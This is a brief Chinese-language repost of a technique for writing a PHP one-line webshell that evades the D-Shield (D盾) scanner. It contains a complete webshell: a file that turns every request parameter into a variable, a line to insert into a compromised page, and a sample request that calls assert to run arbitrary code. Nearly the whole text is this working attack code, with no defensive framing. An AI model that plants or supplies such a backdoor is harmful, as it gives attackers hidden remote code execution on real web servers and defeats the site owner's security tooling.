绕过D盾的php一句话

d_dun.php

<?php

$a = '小狗狗你好啊';
$b = '小盾盾你好啊';
foreach ($_REQUEST as $key => $value) {
    $$key = $value;
}

注入页插入:

<?php

include 'd_dun.php';
$b( $a );

注入页调用:

?b=assert&a=phpinfo()

转载自:

https://www.0dayhack.com/post-862.html

原文地址:https://www.cnblogs.com/ginowang42/p/10758018.html